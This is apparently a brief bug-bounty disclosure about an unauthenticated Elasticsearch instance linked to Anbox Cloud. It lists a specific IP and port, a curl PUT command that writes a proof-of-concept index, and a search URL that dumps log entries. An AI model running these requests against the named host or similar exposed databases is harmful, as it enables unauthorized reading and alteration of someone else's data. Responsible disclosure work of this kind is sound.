i found bug Elasticsearch instance unprotected, thus allowing an
attacker to perform write/read operations on the database
anbox cloud
step to create
1- i use for exploit bug and create poc in db by used in linux os
curl -XPUT 'http://40.68.164.154:9200/poc3' and see create poc in db
http://40.68.164.154:9200/poc3
and go to http://40.68.164.154:9200/.ds-logs-generic-default-2024.08.26-000006/_search?size=1000 and see https://contracts.canonical.com/v1/resources?architecture=amd64&kernel=6.5.0-1017-azure&series=jammy&virt=microsoft and after go to this url and see anbox-cloud which used azure cloud provider
thus allowing an attacker to perform write/read operations on the
attacker to perform write/read operations on the database
anbox cloud
